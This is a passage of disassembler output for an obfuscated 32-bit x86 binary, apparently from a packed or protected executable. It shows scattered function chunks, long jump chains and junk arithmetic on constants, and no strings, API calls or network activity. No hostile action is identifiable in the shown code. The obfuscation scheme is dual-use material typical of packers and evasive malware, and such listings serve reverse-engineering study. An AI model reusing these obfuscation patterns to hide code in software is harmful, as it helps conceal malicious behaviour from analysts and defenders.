; FUNCTION CHUNK AT 00447E0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458FD0 SIZE 0000000F BYTES

		xchg	edi, [esp+0]
		pop	edi
		xor	eax, 1E38EC3Dh
		add	eax, ebp
		jmp	loc_43E44D
sub_44D3E8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_44D3F9:				; CODE XREF: sub_442334+AFBEj
		jz	loc_452BFA
		jmp	loc_45A93D
; END OF FUNCTION CHUNK	FOR sub_442334
; ---------------------------------------------------------------------------

loc_44D404:				; DATA XREF: sub_440944+16o
		add	ecx, 22D98ADh
		mov	[ecx], eax
		pop	ecx
		jmp	loc_457FCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_44D412:				; CODE XREF: sub_448663j
		push	0DF969F58h
		pop	eax
		jmp	loc_4403C1
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
		jmp	ds:off_41D114
; ---------------------------------------------------------------------------

loc_44D423:				; CODE XREF: hvvrg7ie:0044B2F1j
		jmp	sub_43E7F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_44D428:				; CODE XREF: sub_450590-15612j
					; hvvrg7ie:loc_4560AEj	...
		pop	edx
		jo	loc_45766B
		mov	eax, [esp-4+arg_0]
		call	sub_4396C7
; END OF FUNCTION CHUNK	FOR sub_450590
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_44D437:				; CODE XREF: sub_43FC15+EB90j
		jmp	loc_456D60
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_44D43C:				; CODE XREF: sub_44E3B3-54ACj
		jmp	loc_446039
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE41

loc_44D441:				; CODE XREF: sub_43AE41+D58Ej
		jmp	loc_443C84
; END OF FUNCTION CHUNK	FOR sub_43AE41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_44D446:				; CODE XREF: sub_448663:loc_43D74Bj
		call	sub_440944

loc_44D44B:				; CODE XREF: sub_43B3BE:loc_459106j
					; sub_43E128+1C382j
		jmp	loc_451127
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_44D450:				; CODE XREF: sub_44CEC8:loc_43C8CBj
		jnz	loc_455AFF
		jmp	loc_45A81D
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
		test	edi, 0FEE4C335h
		jmp	loc_452F39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DD2C

loc_44D466:				; CODE XREF: sub_43DD2C+76B5j
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43DD2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F65

loc_44D46A:				; CODE XREF: sub_451F65+1Cj
		jmp	loc_44AB42
; END OF FUNCTION CHUNK	FOR sub_451F65

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44D46F	proc near		; CODE XREF: sub_43DD2C+Ep
					; hvvrg7ie:0045520Cp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0045141C SIZE 0000000D BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		jmp	loc_45141C
sub_44D46F	endp


; =============== S U B	R O U T	I N E =======================================



sub_44D47A	proc near		; CODE XREF: hvvrg7ie:0044A984j
					; hvvrg7ie:00459C35p

arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043A6A8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B810 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C653 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EB6C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044085B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440FB3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00442C9A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044430B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A051 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044FBF1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452002 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452A8F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452B93 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00454D02 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004589E4 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 0045AC80 SIZE 00000020 BYTES

		xchg	edx, [esp+0]
		pop	edx
		or	eax, eax
		jnz	loc_440860
		jmp	loc_44430B
sub_44D47A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_44D48B:				; CODE XREF: hvvrg7ie:00440EA8j
		retn
; ---------------------------------------------------------------------------

loc_44D48C:				; CODE XREF: hvvrg7ie:00445BFAj
		jmp	locret_458C07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8FB

loc_44D491:				; CODE XREF: sub_44C8FB-D29Ej
		add	ecx, ebx
		jmp	loc_456B11
; END OF FUNCTION CHUNK	FOR sub_44C8FB
; ---------------------------------------------------------------------------

locret_44D498:				; CODE XREF: hvvrg7ie:00445B70j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440402

loc_44D499:				; CODE XREF: sub_440402+9536j
		jmp	loc_44F8D2
; END OF FUNCTION CHUNK	FOR sub_440402
; ---------------------------------------------------------------------------

loc_44D49E:				; CODE XREF: hvvrg7ie:00459D47j
		jno	loc_45675E
		or	ebp, edx
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_44D4A6:				; CODE XREF: sub_43B6A5:loc_459F3Bj
		and	ebx, 301F738h
		or	ebx, 30370A20h
		jmp	loc_44BA35
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449AD1

loc_44D4B7:				; CODE XREF: sub_449AD1+19j
		jl	loc_44F976

loc_44D4BD:				; CODE XREF: hvvrg7ie:004586C3j
		jmp	loc_440A66
; END OF FUNCTION CHUNK	FOR sub_449AD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A5F4

loc_44D4C2:				; CODE XREF: sub_45A5F4-C3FEj
		jmp	nullsub_414
; END OF FUNCTION CHUNK	FOR sub_45A5F4
; ---------------------------------------------------------------------------

loc_44D4C7:				; CODE XREF: hvvrg7ie:0043EBB1j
		jmp	locret_446C40
; ---------------------------------------------------------------------------
		popf
		test	esi, 6EACCAFDh
		jmp	loc_44F970
; ---------------------------------------------------------------------------

loc_44D4D8:				; CODE XREF: hvvrg7ie:loc_454E99j
					; DATA XREF: sub_4591C3-17217o
		pop	edi
		mov	edx, [edx]
		add	eax, edx
		push	offset loc_43FCB0
		jmp	loc_45AC1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452637

loc_44D4E7:				; CODE XREF: sub_452637:loc_43EC2Fj
		xchg	edi, [esp+0]
		jmp	loc_44D7CF
; END OF FUNCTION CHUNK	FOR sub_452637

; =============== S U B	R O U T	I N E =======================================



sub_44D4EF	proc near		; CODE XREF: hvvrg7ie:0044119Bj
					; sub_456763+3360p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DE79 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043FAEB SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043FEF1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044717C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004538A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004546E2 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00459478 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00459747 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A7D6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B5AA SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_43DE79
		jmp	loc_4538A2
sub_44D4EF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_44D502:				; CODE XREF: sub_445F2A+1777j
		and	edi, edx
		mov	ebx, 1983E400h

loc_44D509:				; CODE XREF: hvvrg7ie:loc_43EF71j
					; sub_442F6B+2j ...
		call	sub_44D7AC

loc_44D50E:				; CODE XREF: sub_45903D+11j
		jmp	loc_456D6D
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------

loc_44D513:				; CODE XREF: hvvrg7ie:00450746j
		jmp	loc_44A47D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C9B0

loc_44D518:				; CODE XREF: sub_44C9B0+1Fj
		jmp	loc_44852B
; END OF FUNCTION CHUNK	FOR sub_44C9B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443874

loc_44D51D:				; CODE XREF: sub_443874+55EBj
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_443874
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_44D522:				; CODE XREF: sub_4554E8-11D92j
		jmp	loc_43AFE4
; END OF FUNCTION CHUNK	FOR sub_4554E8

; =============== S U B	R O U T	I N E =======================================



sub_44D527	proc near		; DATA XREF: sub_445CCD+95D6o
		xor	eax, esi
		add	eax, edi
		add	al, ah
sub_44D527	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44C513

loc_44D52D:				; CODE XREF: sub_44C513:loc_43B14Aj
		and	eax, 7
		mov	[ebp-4], eax
		jmp	loc_45A9CE
; END OF FUNCTION CHUNK	FOR sub_44C513
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_44D538:				; CODE XREF: sub_455ACA:loc_457E83j
		jz	loc_456D9B
		jmp	loc_45AE09
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_44D543:				; CODE XREF: sub_4512A0+13F9j
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_45A959
		jmp	loc_44899A
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------

loc_44D552:				; CODE XREF: hvvrg7ie:loc_45067Dj
		push	edi
		mov	edi, ecx
		xchg	edi, [esp]
		push	66A0549Ah
		jmp	loc_453C14
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44048E

loc_44D562:				; CODE XREF: sub_44048E-6124j
		popf
		ror	eax, 1Fh
		mov	[edi], eax
		not	edx
		jmp	loc_43AF4C
; END OF FUNCTION CHUNK	FOR sub_44048E
; ---------------------------------------------------------------------------

loc_44D56F:				; CODE XREF: hvvrg7ie:0044535Bj
		jnb	loc_45717B
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_44D575:				; CODE XREF: sub_4465A6:loc_445344j
		sub	ecx, 0D8B0FFB1h
		add	ecx, 3E1E896Bh
		xchg	ecx, [esp+0]
		jmp	loc_43BA1D
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_44D589:				; CODE XREF: sub_45B048:loc_45A822j
		jz	loc_43A727
; END OF FUNCTION CHUNK	FOR sub_45B048
; START	OF FUNCTION CHUNK FOR sub_45AD46

loc_44D58F:				; CODE XREF: sub_45AD46-2605j
		jmp	nullsub_439
; END OF FUNCTION CHUNK	FOR sub_45AD46
; ---------------------------------------------------------------------------

loc_44D594:				; CODE XREF: hvvrg7ie:0044ED3Bj
		jmp	loc_456838
; ---------------------------------------------------------------------------

loc_44D599:				; CODE XREF: hvvrg7ie:0043B61Fj
		jmp	loc_44966B
; ---------------------------------------------------------------------------
		jb	loc_440D8F
		not	ebp
		or	esi, ebp
		cmp	ebp, 1D581E22h
		jmp	loc_43A71E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_44D5B3:				; CODE XREF: sub_45541B+3A11j
		and	ecx, 59E407F1h
		xor	ecx, 45166D9h
		jns	loc_44BDCA

loc_44D5C5:				; CODE XREF: sub_4403D4+82F7j
		jmp	loc_441280
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
		or	ecx, ebx
		cdq
		jmp	loc_44BDCA
; ---------------------------------------------------------------------------

loc_44D5D2:				; CODE XREF: hvvrg7ie:loc_43C97Ej
					; hvvrg7ie:loc_445F16j
		jge	loc_44B337
; START	OF FUNCTION CHUNK FOR sub_44475F

loc_44D5D8:				; CODE XREF: sub_44475F+7j
		jmp	nullsub_23
; END OF FUNCTION CHUNK	FOR sub_44475F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E23

loc_44D5DD:				; CODE XREF: sub_441E23-5178j
		jmp	loc_44C1C6
; END OF FUNCTION CHUNK	FOR sub_441E23
; ---------------------------------------------------------------------------
		xchg	ebp, ebx
		mov	esi, [ebx]
		jmp	loc_44B335
; ---------------------------------------------------------------------------

loc_44D5EB:				; DATA XREF: sub_4540B2-102F2o
		add	edx, 0BD0D0C9Fh
		mov	edx, [edx]
		add	eax, edx
		pop	edx
		call	sub_44F66B
		jmp	loc_44C97A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439990

loc_44D600:				; CODE XREF: sub_439990+19j
		push	eax
		push	66FC761Bh
		pop	eax
		add	eax, 0CDD19445h
		rol	eax, 5
		jmp	loc_44F7CA
; END OF FUNCTION CHUNK	FOR sub_439990
; ---------------------------------------------------------------------------
		pop	edx
		pop	eax
		mov	ds:dword_440588, edx
; START	OF FUNCTION CHUNK FOR sub_4575D9

loc_44D61D:				; CODE XREF: sub_458A13-C91Dj
					; sub_4575D9+Aj
		xchg	eax, edx

loc_44D61E:				; CODE XREF: hvvrg7ie:0043F97Fj
		call	sub_446A16
		jmp	loc_43CDF5
; END OF FUNCTION CHUNK	FOR sub_4575D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_44D628:				; CODE XREF: sub_4569C6-1C8AEj
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44BB24
		jmp	loc_45B197
; END OF FUNCTION CHUNK	FOR sub_4569C6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_312. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_44D639:				; CODE XREF: sub_444BE1+ED3Aj
		jmp	sub_456423
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_44D63E:				; CODE XREF: sub_448BC0:loc_448D14j
		add	eax, 50C3FEF5h

loc_44D644:				; CODE XREF: hvvrg7ie:loc_452ADBj
		push	ebx
		pushf
		push	4E46BA01h
		pop	ebx
		rol	ebx, 16h
		jmp	loc_459762
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514E0

loc_44D654:				; CODE XREF: sub_4514E0:loc_452BE6j
		add	ebx, ds:4000F2h
		and	ebx, 0F9F6E103h
		xor	ebx, 0B3791D2Dh
		add	ebx, 3CA899FEh
		jmp	loc_45A47C
; END OF FUNCTION CHUNK	FOR sub_4514E0

; =============== S U B	R O U T	I N E =======================================



sub_44D671	proc near		; CODE XREF: hvvrg7ie:0045333Dj
					; hvvrg7ie:004549F9p

; FUNCTION CHUNK AT 00444A43 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00446552 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B24D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E16A SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004503B7 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_441C18
		jmp	loc_446552
sub_44D671	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44D684:				; CODE XREF: hvvrg7ie:loc_43D5E4j
		cdq
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_44D685:				; CODE XREF: sub_43DB4C:loc_443A11j
		mov	edi, [esi]
		jmp	loc_456324
; END OF FUNCTION CHUNK	FOR sub_43DB4C
; ---------------------------------------------------------------------------

loc_44D68C:				; CODE XREF: hvvrg7ie:0044A037j
		or	esi, 94F27A88h
		push	offset sub_43BA2E
		jmp	locret_43A38A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_44D69C:				; CODE XREF: sub_455087:loc_45830Bj
		mov	edx, 682027DCh
		jmp	loc_45A218
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44D6A6:				; CODE XREF: sub_44D2F8+2C74j
		rol	eax, 7
		jmp	loc_4452BE
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_44D6AE:				; CODE XREF: sub_44E3B3+4j
		cmp	dword ptr [ebp-4], 1
		jnz	loc_4452BE
		jmp	loc_446116
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AF0A

loc_44D6BD:				; CODE XREF: sub_45AF0A:loc_45AF0Fj
		mov	edx, [ebp-20h]
		mov	[edx], al
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		cmp	byte ptr [eax],	2Eh
		jnz	loc_454A93
		mov	eax, [ebp-20h]
		jmp	loc_44601D
; END OF FUNCTION CHUNK	FOR sub_45AF0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_44D6D9:				; CODE XREF: sub_44736C+D4F8j
		jnz	loc_451C15
		jmp	loc_4491BB
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_44D6E4:				; CODE XREF: sub_44388C-4B28j
					; sub_44388C+9E72j ...
		jno	loc_439882
		add	edx, 14h
		mov	ecx, [ebx+edx-8]
		or	ecx, ecx
		jz	loc_43C3D7
		call	sub_459CC4
		jnz	loc_44D6E4
		call	sub_439873
; END OF FUNCTION CHUNK	FOR sub_44388C
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_44D709:				; CODE XREF: sub_43B6A5:loc_45901Cj
		jmp	loc_43C702
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_44D70E:				; CODE XREF: sub_449425+E1AFj
		jmp	loc_447B26
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_44D713:				; CODE XREF: sub_4413A5+2B28j
		jmp	loc_44E360
; END OF FUNCTION CHUNK	FOR sub_4413A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_432. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D240

loc_44D719:				; CODE XREF: sub_44D240:loc_43C831j
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		xor	eax, eax
		mov	[ebp-0Ch], eax

loc_44D724:				; CODE XREF: sub_44980B:loc_440466j
		push	offset loc_450CC2
		jmp	nullsub_106
; END OF FUNCTION CHUNK	FOR sub_44D240
; ---------------------------------------------------------------------------

loc_44D72E:				; CODE XREF: hvvrg7ie:0045510Fj
		and	edi, edx

; =============== S U B	R O U T	I N E =======================================



sub_44D730	proc near		; CODE XREF: hvvrg7ie:004467E2p
		xchg	esi, [esp+0]
		pop	esi
		push	ecx
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_458DA4
		push	offset sub_45B395
		jmp	loc_43E199
sub_44D730	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447DF9

loc_44D748:				; CODE XREF: sub_447DF9+Dj
		or	eax, eax
		jnz	loc_447022
		jmp	loc_4591F4
; END OF FUNCTION CHUNK	FOR sub_447DF9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_44D755:				; CODE XREF: sub_448BC0+B3DBj
		add	eax, 7BB0A69h
		mov	edx, [esp+0Ch+var_C]
		push	eax
		mov	eax, edx
		push	edi
		mov	edi, 0B3210AA1h
		jmp	loc_45A9BD
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44D76C:				; CODE XREF: sub_442FD1+17FF5j
		js	loc_454FC8
		pop	eax
		pushf

loc_44D774:				; CODE XREF: sub_442FD1:loc_44C608j
		mov	eax, [ebp-24h]
		mov	ecx, [eax+4]
		mov	eax, [ebp-24h]
		mov	dx, [eax+2]
		mov	eax, [ebp-14h]
		jmp	loc_44F9A3
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B63C

loc_44D789:				; CODE XREF: sub_43B63C:loc_452007j
		xchg	eax, [esp+0]
		push	ebx
		push	9ECFF6A2h
		pop	ebx
		jmp	loc_4502AA
; END OF FUNCTION CHUNK	FOR sub_43B63C

; =============== S U B	R O U T	I N E =======================================



sub_44D798	proc near		; CODE XREF: hvvrg7ie:0045164Cj
					; hvvrg7ie:00454844p
		xchg	ebx, [esp+0]
		pop	ebx
		push	0
		call	sub_458746
		sub	ebp, ebx
		jmp	sub_44BC0E
sub_44D798	endp

; ---------------------------------------------------------------------------

loc_44D7AA:				; CODE XREF: hvvrg7ie:004574E9j
		not	edi

; =============== S U B	R O U T	I N E =======================================



sub_44D7AC	proc near		; CODE XREF: sub_445F2A:loc_44D509p

; FUNCTION CHUNK AT 00451DC6 SIZE 0000000A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		jmp	loc_451DC6
sub_44D7AC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	loc_4470C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_536. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_44D7BB:				; CODE XREF: sub_4408AE+EE0Bj
		jmp	nullsub_283
; END OF FUNCTION CHUNK	FOR sub_4408AE

; =============== S U B	R O U T	I N E =======================================



sub_44D7C0	proc near		; CODE XREF: sub_44059F:loc_442DA8p
					; hvvrg7ie:00454AD2j
		xchg	eax, [esp+0]
		pop	eax
		mov	edx, ds:dword_457B4C
		call	sub_458095

loc_44D7CF:				; CODE XREF: sub_452637-514Dj
		jmp	sub_450C5A
sub_44D7C0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448057

loc_44D7D4:				; CODE XREF: sub_448057+11j
		jmp	loc_444F2C
; END OF FUNCTION CHUNK	FOR sub_448057
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450C5A

loc_44D7D9:				; CODE XREF: sub_450C5A:loc_43E052j
		jmp	nullsub_128
; END OF FUNCTION CHUNK	FOR sub_450C5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452585

loc_44D7DE:				; CODE XREF: sub_452585-124BBj
		or	dword ptr [eax-8], 4
		mov	eax, [ebp-4]
		movzx	eax, byte ptr [eax]
		mov	edx, [ebp+8]
		call	sub_44DA89
; END OF FUNCTION CHUNK	FOR sub_452585
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_44D7F0:				; CODE XREF: sub_4527A1:loc_4493A5j
					; sub_454040+10j
		jz	loc_4416DF
		jmp	loc_4545CF
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------
		jmp	ds:off_41D1F8
; ---------------------------------------------------------------------------

loc_44D801:				; CODE XREF: hvvrg7ie:0043E403j
		jmp	locret_4516EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B44

loc_44D806:				; CODE XREF: hvvrg7ie:loc_444E3Fj
					; sub_439B44:loc_447B5Aj ...
		xchg	esi, [esp-4+arg_0]
		mov	edx, esi
		pop	esi
		push	offset loc_4445C9
		jmp	loc_45B673
; END OF FUNCTION CHUNK	FOR sub_439B44
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_44D816:				; CODE XREF: sub_452B83:loc_44FD47j
		mov	edi, esi
		pop	esi
		sub	edi, 55A6CE35h
		add	edi, 11D379B5h
		and	ecx, edi
		pop	edi
		pushf
		push	3258112Eh
		jmp	loc_459F46
; END OF FUNCTION CHUNK	FOR sub_452B83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440CB

loc_44D833:				; CODE XREF: sub_4440CB:loc_444D2Bj
		jno	loc_441693
		jmp	loc_458FC4
; END OF FUNCTION CHUNK	FOR sub_4440CB
; ---------------------------------------------------------------------------

loc_44D83E:				; CODE XREF: hvvrg7ie:loc_44B7B7j
		push	edx
		call	sub_4546E9
		push	80A8CC2Ch
		pop	eax
		or	eax, 6EDF10C9h
		cmp	eax, 26372F02h
		jmp	loc_4497EF
; ---------------------------------------------------------------------------

loc_44D85B:				; CODE XREF: hvvrg7ie:00456AFFj
		mov	eax, [ebp+0]
		jno	loc_4539A2
		xor	edx, esi
; START	OF FUNCTION CHUNK FOR sub_44957E

loc_44D866:				; CODE XREF: sub_44957E:loc_456AEEj
		call	sub_4402F5

loc_44D86B:				; CODE XREF: hvvrg7ie:0044D8ECj
		jl	loc_444943
; END OF FUNCTION CHUNK	FOR sub_44957E
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_44D871:				; CODE XREF: sub_440C05+12580j
		jmp	loc_45537C
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
		sbb	ecx, esi
		xchg	ebx, [ebp+0]
		and	esi, ebx
		sub	ebx, edx
		jmp	loc_444943
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44D884:				; CODE XREF: sub_45889B:loc_44F665j
		pop	ecx

loc_44D885:				; CODE XREF: sub_458706:loc_43E375j
		sub	ecx, ds:4000FAh

loc_44D88B:				; CODE XREF: hvvrg7ie:loc_440804j
		add	ecx, 42771F04h
		popf
		sub	eax, ecx
		pop	ecx
		jmp	loc_44AEC5
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_44D89A:				; CODE XREF: hvvrg7ie:0043EDB1j
		sbb	eax, 8FE1EFF4h
		jmp	loc_448492
; ---------------------------------------------------------------------------

loc_44D8A5:				; DATA XREF: sub_44D2F8:loc_43BCB4o
		jo	loc_4493F3
		push	0
		push	0
		push	10h
		jmp	loc_459F41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_44D8B6:				; CODE XREF: sub_453405-16DD1j
		jz	loc_443C9A
		jmp	loc_453DE5
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
		push	0E519915Eh
		pop	ebp
		jmp	sub_443B00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_44D8CC:				; CODE XREF: sub_45A7E8:loc_445624j
					; hvvrg7ie:00452042j
		or	ebx, esi
; END OF FUNCTION CHUNK	FOR sub_45A7E8

; =============== S U B	R O U T	I N E =======================================



sub_44D8CE	proc near		; CODE XREF: sub_449425:loc_45B136p

; FUNCTION CHUNK AT 0044BECC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452892 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A18E SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xor	eax, ecx
		pop	ecx
		jmp	loc_452892
sub_44D8CE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44D8DA:				; CODE XREF: hvvrg7ie:loc_458DADj
		xor	ebx, 1A37DCE1h
		and	ebx, 0EDBD5DA2h
		cmp	ebx, 0F4F26C32h
		jmp	loc_44D86B
; ---------------------------------------------------------------------------
		call	sub_44DE0A
		push	0DB064A64h
		pop	edx
		xor	edx, 8DE19FC5h
		add	edx, ds:4000F7h
; START	OF FUNCTION CHUNK FOR sub_443452

loc_44D908:				; CODE XREF: sub_443452:loc_44972Fj
		xor	edx, 0ADEFE002h
		call	sub_446A16
		push	ebx
		jmp	loc_4516EF
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------

loc_44D919:				; CODE XREF: hvvrg7ie:0044E1A4j
		mov	edx, [ebp+8]
		call	sub_449B65
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_44D921:				; CODE XREF: sub_445CCD+4884j
		jnp	loc_4444C7
		add	ebx, 6379BB05h

loc_44D92D:				; CODE XREF: sub_445CCD:loc_43F39Bj
		call	sub_45B70B
